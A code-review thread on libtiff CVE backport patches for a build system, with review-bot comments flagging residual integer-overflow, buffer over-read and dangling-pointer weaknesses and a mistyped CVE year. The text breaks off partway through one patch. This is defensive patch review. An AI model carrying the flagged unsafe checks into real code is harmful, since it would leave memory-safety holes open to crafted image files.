+diff --git a/man/tiff2rgba.1 b/man/tiff2rgba.1
+index d9c9baae..fe9ebb2c 100644
+--- a/man/tiff2rgba.1
++++ b/man/tiff2rgba.1
+@@ -87,6 +87,10 @@ Drop the alpha component from the output file, producing a pure RGB file.
+ Currently this does not work if the
+ .B \-b
+ flag is also in effect.
++.TP
++.BI \-M " size"
++Set maximum memory allocation size (in MiB). The default is 256MiB.
++Set to 0 to disable the limit.
+ .SH "SEE ALSO"
+ .BR tiff2bw (1),
+ .BR TIFFReadRGBAImage (3t),
+--
+GitLab
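Review bot: The `-M` handler, `maxMalloc = (tmsize_t)strtoul(optarg, NULL, 0) << 20;`, accepts anything: a non-numeric argument parses as 0, which the new checks treat as "limit disabled", and a large value can overflow the shift into a wrapped or negative `tmsize_t`. Because this limit is the mitigation for both CVEs, a malformed argument should be rejected rather than silently switching the guard off; a sketch follows, assuming `TIFF_TMSIZE_T_MAX` from tiffiop.h is available in this libtiff version. From the visible hunks the limit is compared only against the whole-image raster and `TIFFStripSize(in)`; whether the `cvt_by_tile` and `cvt_by_strip` allocations are covered cannot be confirmed here. `main` starts and ends outside the inner hunk.

```c
		case 'M': {
			/* Reject non-numeric or out-of-range sizes; 0 must be an explicit choice. */
			char *end = NULL;
			unsigned long mib = strtoul(optarg, &end, 0);
			if (end == optarg || *end != '\0' ||
			    mib > (unsigned long)(TIFF_TMSIZE_T_MAX >> 20))
				usage(EXIT_FAILURE);
			maxMalloc = (tmsize_t)mib << 20;
			break;
		}
		/* … unchanged: remaining option cases … */
```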
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch
new file mode 100644
index 0000000000..1f30b32799
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch
@@ -0,0 +1,55 @@
+From c8d613ef497058fe653c467fc84c70a62a4a71b2 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Tue, 10 Nov 2020 01:54:30 +0100
+Subject: [PATCH] gtTileContig(): check Tile width for overflow
+
+fixes #211
+
+Upstream-Status: Backport [ https://gitlab.com/libtiff/libtiff/-/commit/c8d613ef497058fe653c467fc84c70a62a4a71b2 ]
+CVE: CVE-2020-35523
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ libtiff/tif_getimage.c | 17 +++++++++++++----
+ 1 file changed, 13 insertions(+), 4 deletions(-)
+
+diff --git a/libtiff/tif_getimage.c b/libtiff/tif_getimage.c
+index 4da785d3..96ab1460 100644
+--- a/libtiff/tif_getimage.c
++++ b/libtiff/tif_getimage.c
+@@ -29,6 +29,7 @@
+ */
+ #include "tiffiop.h"
+ #include <stdio.h>
++#include <limits.h>
+
+ static int gtTileContig(TIFFRGBAImage*, uint32*, uint32, uint32);
+ static int gtTileSeparate(TIFFRGBAImage*, uint32*, uint32, uint32);
+@@ -645,12 +646,20 @@ gtTileContig(TIFFRGBAImage* img, uint32* raster, uint32 w, uint32 h)
+
+ flip = setorientation(img);
+ if (flip & FLIP_VERTICALLY) {
+- y = h - 1;
+- toskew = -(int32)(tw + w);
++ if ((tw + w) > INT_MAX) {
++ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif), "%s", "unsupported tile size (too wide)");
++ return (0);
++ }
++ y = h - 1;
++ toskew = -(int32)(tw + w);
+ }
+ else {
+- y = 0;
+- toskew = -(int32)(tw - w);
++ if (tw > (INT_MAX + w)) {
++ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif), "%s", "unsupported tile size (too wide)");
++ return (0);
++ }
++ y = 0;
++ toskew = -(int32)(tw - w);
+ }
+
+ /*
+--
+GitLab
+
+
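Review bot: Both new width checks are evaluated in 32-bit unsigned arithmetic, so they can wrap before the comparison is made. In `if ((tw + w) > INT_MAX)` the sum of two `uint32` values is reduced modulo 2^32, and in `if (tw > (INT_MAX + w))` the right-hand side wraps once `w` is large enough. An out-of-range width can therefore still reach the `-(int32)(...)` cast that the check is meant to protect. Widening before comparing closes this: `if ((uint64)tw + w > INT_MAX)` and `if ((uint64)tw > (uint64)INT_MAX + w)`. `gtTileContig` begins and ends outside the inner hunk, so whether `tw` and `w` are bounded earlier is not visible here.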
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch
new file mode 100644
index 0000000000..5232eacb50
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch
@@ -0,0 +1,42 @@
+From c6a12721b46f1a72974f91177890301730d7b330 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Tue, 10 Nov 2020 01:01:59 +0100
+Subject: [PATCH] tiff2pdf.c: properly calculate datasize when saving to JPEG
+ YCbCr
+
+fixes #220
+Upstream-Status: Backport
+https://gitlab.com/libtiff/libtiff/-/commit/c6a12721b46f1a72974f91177890301730d7b330
+https://gitlab.com/libtiff/libtiff/-/merge_requests/159/commits
+CVE: CVE-2021-35524
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ tools/tiff2pdf.c | 11 ++++++++---
+ 1 file changed, 8 insertions(+), 3 deletions(-)
+
+diff --git a/tools/tiff2pdf.c b/tools/tiff2pdf.c
+index 719811ea..dc69d2f9 100644
+--- a/tools/tiff2pdf.c
++++ b/tools/tiff2pdf.c
+@@ -2087,9 +2087,14 @@ void t2p_read_tiff_size(T2P* t2p, TIFF* input){
+ #endif
+ (void) 0;
+ }
+- k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
+- if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
+- k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
++ if(t2p->pdf_compression == T2P_COMPRESS_JPEG
++ && t2p->tiff_photometric == PHOTOMETRIC_YCBCR) {
++ k = checkMultiply64(TIFFNumberOfStrips(input), TIFFStripSize(input), t2p);
++ } else {
++ k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
++ if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
++ k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
++ }
+ }
+ if (k == 0) {
+ /* Assume we had overflow inside TIFFScanlineSize */
+--
+GitLab
+
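Review bot: The header tag reads `CVE: CVE-2021-35524`, but the file is named CVE-2020-35524-1.patch and sits alongside the other CVE-2020-3552x fixes, so the year looks like a typo; CVE-2020-35524-2.patch carries the same tag. Tooling that reads `CVE:` tags from patch headers would then record a different identifier as patched. I would change the line in both files to `CVE: CVE-2020-35524`. The `Upstream-Status: Backport` line would also be easier to parse with the commit URL in brackets on the same line, as the neighbouring patches do.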
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch
new file mode 100644
index 0000000000..406d467766
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch
@@ -0,0 +1,36 @@
+From d74f56e3b7ea55c8a18a03bc247cd5fd0ca288b2 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Tue, 10 Nov 2020 02:05:05 +0100
+Subject: [PATCH] Fix for building without JPEG support
+
+Upstream-Status: Backport
+https://gitlab.com/libtiff/libtiff/-/commit/d74f56e3b7ea55c8a18a03bc247cd5fd0ca288b2
+https://gitlab.com/libtiff/libtiff/-/merge_requests/159/commits
+CVE: CVE-2021-35524
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ tools/tiff2pdf.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/tools/tiff2pdf.c b/tools/tiff2pdf.c
+index dc69d2f9..d0b0ede7 100644
+--- a/tools/tiff2pdf.c
++++ b/tools/tiff2pdf.c
+@@ -2087,10 +2087,13 @@ void t2p_read_tiff_size(T2P* t2p, TIFF* input){
+ #endif
+ (void) 0;
+ }
++#ifdef JPEG_SUPPORT
+ if(t2p->pdf_compression == T2P_COMPRESS_JPEG
+ && t2p->tiff_photometric == PHOTOMETRIC_YCBCR) {
+ k = checkMultiply64(TIFFNumberOfStrips(input), TIFFStripSize(input), t2p);
+- } else {
++ } else
++#endif
++ {
+ k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
+ if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
+ k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch
new file mode 100644
index 0000000000..e2d136f587
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch
@@ -0,0 +1,39 @@
+From a1c933dabd0e1c54a412f3f84ae0aa58115c6067 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Thu, 24 Feb 2022 22:26:02 +0100
+Subject: [PATCH] tif_jbig.c: fix crash when reading a file with multiple IFD
+ in memory-mapped mode and when bit reversal is needed (fixes #385)
+
+CVE: CVE-2022-0865
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0865.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ libtiff/tif_jbig.c | 10 ++++++++++
+ 1 file changed, 10 insertions(+)
+
+diff --git a/libtiff/tif_jbig.c b/libtiff/tif_jbig.c
+index 74086338..8bfa4cef 100644
+--- a/libtiff/tif_jbig.c
++++ b/libtiff/tif_jbig.c
+@@ -208,6 +208,16 @@ int TIFFInitJBIG(TIFF* tif, int scheme)
+ */
+ tif->tif_flags |= TIFF_NOBITREV;
+ tif->tif_flags &= ~TIFF_MAPPED;
++ /* We may have read from a previous IFD and thus set TIFF_BUFFERMMAP and
++ * cleared TIFF_MYBUFFER. It is necessary to restore them to their initial
++ * value to be consistent with the state of a non-memory mapped file.
++ */
++ if (tif->tif_flags&TIFF_BUFFERMMAP) {
++ tif->tif_rawdata = NULL;
++ tif->tif_rawdatasize = 0;
++ tif->tif_flags &= ~TIFF_BUFFERMMAP;
++ tif->tif_flags |= TIFF_MYBUFFER;
++ }
+
+ /* Setup the function pointers for encode, decode, and cleanup. */
+ tif->tif_setupdecode = JBIGSetupDecode;
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch
new file mode 100644
index 0000000000..e2f1bd3056
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch
@@ -0,0 +1,217 @@
+From 232282fd8f9c21eefe8d2d2b96cdbbb172fe7b7c Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Tue, 8 Mar 2022 17:02:44 +0000
+Subject: [PATCH] tiffcrop: fix issue #380 and #382 heap buffer overflow in
+ extractImageSection
+
+CVE: CVE-2022-0891
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0891.patch/]
+Comment: No change in any hunk
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+---
+ tools/tiffcrop.c | 92 +++++++++++++++++++-----------------------------
+ 1 file changed, 36 insertions(+), 56 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f2e5474a..e62bcc71 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -105,8 +105,8 @@
+ * of messages to monitor progess without enabling dump logs.
+ */
+
+-static char tiffcrop_version_id[] = "2.4";
+-static char tiffcrop_rev_date[] = "12-13-2010";
++static char tiffcrop_version_id[] = "2.4.1";
++static char tiffcrop_rev_date[] = "03-03-2010";
+
+ #include "tif_config.h"
+ #include "tiffiop.h"
+@@ -6670,10 +6670,10 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #ifdef DEVELMODE
+ uint32 img_length;
+ #endif
+- uint32 j, shift1, shift2, trailing_bits;
++ uint32 j, shift1, trailing_bits;
+ uint32 row, first_row, last_row, first_col, last_col;
+ uint32 src_offset, dst_offset, row_offset, col_offset;
+- uint32 offset1, offset2, full_bytes;
++ uint32 offset1, full_bytes;
+ uint32 sect_width;
+ #ifdef DEVELMODE
+ uint32 sect_length;
+@@ -6683,7 +6683,6 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #ifdef DEVELMODE
+ int k;
+ unsigned char bitset;
+- static char *bitarray = NULL;
+ #endif
+
+ img_width = image->width;
+@@ -6701,17 +6700,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ dst_offset = 0;
+
+ #ifdef DEVELMODE
+- if (bitarray == NULL)
+- {
+- if ((bitarray = (char *)malloc(img_width)) == NULL)
+- {
+- TIFFError ("", "DEBUG: Unable to allocate debugging bitarray");
+- return (-1);
+- }
+- }
++ char bitarray[39];
+ #endif
+
+- /* rows, columns, width, length are expressed in pixels */
++ /* rows, columns, width, length are expressed in pixels
++ * first_row, last_row, .. are index into image array starting at 0 to width-1,
++ * last_col shall be also extracted. */
+ first_row = section->y1;
+ last_row = section->y2;
+ first_col = section->x1;
+@@ -6721,9 +6715,14 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #ifdef DEVELMODE
+ sect_length = last_row - first_row + 1;
+ #endif
+- img_rowsize = ((img_width * bps + 7) / 8) * spp;
+- full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
+- trailing_bits = (sect_width * bps) % 8;
++ /* The read function loadImage() used copy separate plane data into a buffer as interleaved
++ * samples rather than separate planes so the same logic works to extract regions
++ * regardless of the way the data are organized in the input file.
++ * Furthermore, bytes and bits are arranged in buffer according to COMPRESSION=1 and FILLORDER=1
++ */
++ img_rowsize = (((img_width * spp * bps) + 7) / 8); /* row size in full bytes of source image */
++ full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
++ trailing_bits = (sect_width * spp * bps) % 8; /* trailing bits within the last byte of destination buffer */
+
+ #ifdef DEVELMODE
+ TIFFError ("", "First row: %d, last row: %d, First col: %d, last col: %d\n",
+@@ -6736,10 +6735,9 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+
+ if ((bps % 8) == 0)
+ {
+- col_offset = first_col * spp * bps / 8;
++ col_offset = (first_col * spp * bps) / 8;
+ for (row = first_row; row <= last_row; row++)
+ {
+- /* row_offset = row * img_width * spp * bps / 8; */
+ row_offset = row * img_rowsize;
+ src_offset = row_offset + col_offset;
+
+@@ -6752,14 +6750,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ }
+ else
+ { /* bps != 8 */
+- shift1 = spp * ((first_col * bps) % 8);
+- shift2 = spp * ((last_col * bps) % 8);
++ shift1 = ((first_col * spp * bps) % 8); /* shift1 = bits to skip in the first byte of source buffer*/
+ for (row = first_row; row <= last_row; row++)
+ {
+ /* pull out the first byte */
+ row_offset = row * img_rowsize;
+- offset1 = row_offset + (first_col * bps / 8);
+- offset2 = row_offset + (last_col * bps / 8);
++ offset1 = row_offset + ((first_col * spp * bps) / 8); /* offset1 = offset into source of byte with first bits to be extracted */
+
+ #ifdef DEVELMODE
+ for (j = 0, k = 7; j < 8; j++, k--)
+@@ -6771,12 +6767,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ sprintf(&bitarray[9], " ");
+ for (j = 10, k = 7; j < 18; j++, k--)
+ {
+- bitset = *(src_buff + offset2) & (((unsigned char)1 << k)) ? 1 : 0;
++ bitset = *(src_buff + offset1 + full_bytes) & (((unsigned char)1 << k)) ? 1 : 0;
+ sprintf(&bitarray[j], (bitset) ? "1" : "0");
+ }
+ bitarray[18] = '\0';
+- TIFFError ("", "Row: %3d Offset1: %d, Shift1: %d, Offset2: %d, Shift2: %d\n",
+- row, offset1, shift1, offset2, shift2);
++ TIFFError ("", "Row: %3d Offset1: %"PRIu32", Shift1: %"PRIu32", Offset2: %"PRIu32", Trailing_bits: %"PRIu32"\n",
++ row, offset1, shift1, offset1+full_bytes, trailing_bits);
+ #endif
+
+ bytebuff1 = bytebuff2 = 0;
+@@ -6800,11 +6796,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+
+ if (trailing_bits != 0)
+ {
+- bytebuff2 = src_buff[offset2] & ((unsigned char)255 << (7 - shift2));
++ /* Only copy higher bits of samples and mask lower bits of not wanted column samples to zero */
++ bytebuff2 = src_buff[offset1 + full_bytes] & ((unsigned char)255 << (8 - trailing_bits));
+ sect_buff[dst_offset] = bytebuff2;
+ #ifdef DEVELMODE
+ TIFFError ("", " Trailing bits src offset: %8d, Dst offset: %8d\n",
+- offset2, dst_offset);
++ offset1 + full_bytes, dst_offset);
+ for (j = 30, k = 7; j < 38; j++, k--)
+ {
+ bitset = *(sect_buff + dst_offset) & (((unsigned char)1 << k)) ? 1 : 0;
+@@ -6823,8 +6820,10 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #endif
+ for (j = 0; j <= full_bytes; j++)
+ {
+- bytebuff1 = src_buff[offset1 + j] & ((unsigned char)255 >> shift1);
+- bytebuff2 = src_buff[offset1 + j + 1] & ((unsigned char)255 << (7 - shift1));
++ /* Skip the first shift1 bits and shift the source up by shift1 bits before save to destination.*/
++ /* Attention: src_buff size needs to be some bytes larger than image size, because could read behind image here. */
++ bytebuff1 = src_buff[offset1 + j] & ((unsigned char)255 >> shift1);
++ bytebuff2 = src_buff[offset1 + j + 1] & ((unsigned char)255 << (8 - shift1));
+ sect_buff[dst_offset + j] = (bytebuff1 << shift1) | (bytebuff2 >> (8 - shift1));
+ }
+ #ifdef DEVELMODE
+@@ -6840,36 +6839,17 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #endif
+ dst_offset += full_bytes;
+
++ /* Copy the trailing_bits for the last byte in the destination buffer.
++ Could come from one ore two bytes of the source buffer. */
+ if (trailing_bits != 0)
+ {
+ #ifdef DEVELMODE
+- TIFFError ("", " Trailing bits src offset: %8d, Dst offset: %8d\n", offset1 + full_bytes, dst_offset);
+-#endif
+- if (shift2 > shift1)
+- {
+- bytebuff1 = src_buff[offset1 + full_bytes] & ((unsigned char)255 << (7 - shift2));
+- bytebuff2 = bytebuff1 & ((unsigned char)255 << shift1);
+- sect_buff[dst_offset] = bytebuff2;
+-#ifdef DEVELMODE
+- TIFFError ("", " Shift2 > Shift1\n");
++ TIFFError("", " Trailing bits %4"PRIu32" src offset: %8"PRIu32", Dst offset: %8"PRIu32"\n", trailing_bits, offset1 + full_bytes, dst_offset);
+ #endif
++ /* More than necessary bits are already copied into last destination buffer,
++ * only masking of last byte in destination buffer is necessary.*/
++ sect_buff[dst_offset] &= ((uint8_t)0xFF << (8 - trailing_bits));
+ }
+- else
+- {
+- if (shift2 < shift1)
+- {
+- bytebuff2 = ((unsigned char)255 << (shift1 - shift2 - 1));
+- sect_buff[dst_offset] &= bytebuff2;
+-#ifdef DEVELMODE
+- TIFFError ("", " Shift2 < Shift1\n");
+-#endif
+- }
+-#ifdef DEVELMODE
+- else
+- TIFFError ("", " Shift2 == Shift1\n");
+-#endif
+- }
+- }
+ #ifdef DEVELMODE
+ sprintf(&bitarray[28], " ");
+ sprintf(&bitarray[29], " ");
+@@ -7022,7 +7002,7 @@ writeImageSections(TIFF *in, TIFF *out, struct image_data *image,
+ width = sections[i].x2 - sections[i].x1 + 1;
+ length = sections[i].y2 - sections[i].y1 + 1;
+ sectsize = (uint32)
+- ceil((width * image->bps + 7) / (double)8) * image->spp * length;
++ ceil((width * image->bps * image->spp + 7) / (double)8) * length;
+ /* allocate a buffer if we don't have one already */
+ if (createImageSection(sectsize, sect_buff_ptr))
+ {
+--
+GitLab
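Review bot: The shifted-copy loop `for (j = 0; j <= full_bytes; j++)` reads `src_buff[offset1 + j + 1]`, so its last iteration touches `src_buff[offset1 + full_bytes + 1]`, which for a section ending at the last row and column can lie past the image data. The added "Attention" comment acknowledges this but leaves the requirement informal. Nothing in this patch shows that the buffer passed in is over-allocated, so that should be confirmed in the image loader of this libtiff version before relying on the fix. I would make the comment state the contract exactly: `/* Reads up to src_buff[offset1 + full_bytes + 1]; the caller must allocate src_buff to cover that index. */`. `extractImageSection` begins and ends outside the inner hunks.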
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch
new file mode 100644
index 0000000000..da3ead5481
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch
@@ -0,0 +1,94 @@
+From 40b00cfb32256d377608b4d4cd30fac338d0a0bc Mon Sep 17 00:00:00 2001
+From: Augustus <wangdw.augustus@qq.com>
+Date: Mon, 7 Mar 2022 18:21:49 +0800
+Subject: [PATCH] add checks for return value of limitMalloc (#392)
+
+CVE: CVE-2022-0907
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0907.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ tools/tiffcrop.c | 33 +++++++++++++++++++++------------
+ 1 file changed, 21 insertions(+), 12 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f2e5474a..9b8acc7e 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -7337,7 +7337,11 @@ createImageSection(uint32_t sectsize, unsigned char **sect_buff_ptr)
+ if (!sect_buff)
+ {
+ sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
+- *sect_buff_ptr = sect_buff;
++ if (!sect_buff)
++ {
++ TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
++ return (-1);
++ }
+ _TIFFmemset(sect_buff, 0, sectsize);
+ }
+ else
+@@ -7353,15 +7357,15 @@ createImageSection(uint32_t sectsize, unsigned char **sect_buff_ptr)
+ else
+ sect_buff = new_buff;
+
++ if (!sect_buff)
++ {
++ TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
++ return (-1);
++ }
+ _TIFFmemset(sect_buff, 0, sectsize);
+ }
+ }
+
+- if (!sect_buff)
+- {
+- TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
+- return (-1);
+- }
+ prev_sectsize = sectsize;
+ *sect_buff_ptr = sect_buff;
+
+@@ -7628,7 +7632,11 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ if (!crop_buff)
+ {
+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
+- *crop_buff_ptr = crop_buff;
++ if (!crop_buff)
++ {
++ TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
++ return (-1);
++ }
+ _TIFFmemset(crop_buff, 0, cropsize);
+ prev_cropsize = cropsize;
+ }
+@@ -7644,15 +7652,15 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ }
+ else
+ crop_buff = new_buff;
++ if (!crop_buff)
++ {
++ TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
++ return (-1);
++ }
+ _TIFFmemset(crop_buff, 0, cropsize);
+ }
+ }
+
+- if (!crop_buff)
+- {
+- TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
+- return (-1);
+- }
+ *crop_buff_ptr = crop_buff;
+
+ if (crop->crop_mode & CROP_INVERT)
+@@ -9211,3 +9219,4 @@ invertImage(uint16_t photometric, uint16_t spp, uint16_t bps, uint32_t width, ui
+ * fill-column: 78
+ * End:
+ */
++
+--
+GitLab
+
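Review bot: Both early returns added after the realloc fallback, in createImageSection and again in createCroppedImage, leave the caller's pointer untouched, because `*sect_buff_ptr = sect_buff;` and `*crop_buff_ptr = crop_buff;` are only reached on success. The lines above `else sect_buff = new_buff;` are outside the patch context, so this is inferred: if the failed-realloc path frees the old buffer before retrying with _TIFFmalloc, the caller still holds a freed pointer after the -1 return. Clearing it before returning, `*sect_buff_ptr = NULL;` and `*crop_buff_ptr = NULL;`, would make the failure path safe for the caller's cleanup. Both functions start and end outside the hunks.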
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch
new file mode 100644
index 0000000000..e65af6c600
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch
@@ -0,0 +1,34 @@
+From a95b799f65064e4ba2e2dfc206808f86faf93e85 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Thu, 17 Feb 2022 15:28:43 +0100
+Subject: [PATCH] TIFFFetchNormalTag(): avoid calling memcpy() with a null
+ source pointer and size of zero (fixes #383)
+
+CVE: CVE-2022-0908
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0908.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ libtiff/tif_dirread.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 50ebf8ac..2ec44a4f 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -5021,7 +5021,10 @@ TIFFFetchNormalTag(TIFF* tif, TIFFDirEntry* dp, int recover)
+ _TIFFfree(data);
+ return(0);
+ }
+- _TIFFmemcpy(o,data,(uint32)dp->tdir_count);
++ if (dp->tdir_count > 0 )
++ {
++ _TIFFmemcpy(o,data,(uint32)dp->tdir_count);
++ }
+ o[(uint32)dp->tdir_count]=0;
+ if (data!=0)
+ _TIFFfree(data);
+--
+GitLab
+
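Review bot: The new guard around `_TIFFmemcpy` in TIFFFetchNormalTag has no comment saying it exists for the zero-count case in which `data` may be NULL, so a later cleanup could remove it as redundant. I would add `/* data may be NULL when tdir_count is 0; memcpy with a NULL source is undefined even for a zero length */` above the `if`. The stray space in `> 0 )` could go at the same time. The function body starts and ends outside this hunk.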
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch
new file mode 100644
index 0000000000..d487f1bd95
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch
@@ -0,0 +1,37 @@
+From 32ea0722ee68f503b7a3f9b2d557acb293fc8cde Mon Sep 17 00:00:00 2001
+From: 4ugustus <wangdw.augustus@qq.com>
+Date: Tue, 8 Mar 2022 16:22:04 +0000
+Subject: [PATCH] fix the FPE in tiffcrop (#393)
+
+CVE: CVE-2022-0909
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0909.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ libtiff/tif_dir.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
+index 57055ca9..59b346ca 100644
+--- a/libtiff/tif_dir.c
++++ b/libtiff/tif_dir.c
+@@ -334,13 +334,13 @@ _TIFFVSetField(TIFF* tif, uint32_t tag, va_list ap)
+ break;
+ case TIFFTAG_XRESOLUTION:
+ dblval = va_arg(ap, double);
+- if( dblval < 0 )
++ if( dblval != dblval || dblval < 0 )
+ goto badvaluedouble;
+ td->td_xresolution = _TIFFClampDoubleToFloat( dblval );
+ break;
+ case TIFFTAG_YRESOLUTION:
+ dblval = va_arg(ap, double);
+- if( dblval < 0 )
++ if( dblval != dblval || dblval < 0 )
+ goto badvaluedouble;
+ td->td_yresolution = _TIFFClampDoubleToFloat( dblval );
+ break;
+--
+GitLab
+
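Review bot: The NaN test `dblval != dblval` added to the TIFFTAG_XRESOLUTION and TIFFTAG_YRESOLUTION cases is not self-explanatory, and value-unsafe floating-point optimisation such as -ffast-math may fold it away. A one-line comment such as `/* dblval != dblval is true only for NaN */` would document the intent; `isnan(dblval)` reads better if the file can include <math.h>. Positive infinity still passes both tests and is left to _TIFFClampDoubleToFloat, whose body is not shown here. The switch belongs to _TIFFVSetField, which continues outside the hunk.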
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch
new file mode 100644
index 0000000000..ddb035c972
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch
@@ -0,0 +1,58 @@
+From 88d79a45a31c74cba98c697892fed5f7db8b963a Mon Sep 17 00:00:00 2001
+From: 4ugustus <wangdw.augustus@qq.com>
+Date: Thu, 10 Mar 2022 08:48:00 +0000
+Subject: [PATCH] fix heap buffer overflow in tiffcp (#278)
+
+CVE: CVE-2022-0924
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0924.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ tools/tiffcp.c | 17 ++++++++++++++++-
+ 1 file changed, 16 insertions(+), 1 deletion(-)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index 224583e0..aa32b118 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -1524,12 +1524,27 @@ DECLAREwriteFunc(writeBufferToSeparateSt
+ tdata_t obuf;
+ tstrip_t strip = 0;
+ tsample_t s;
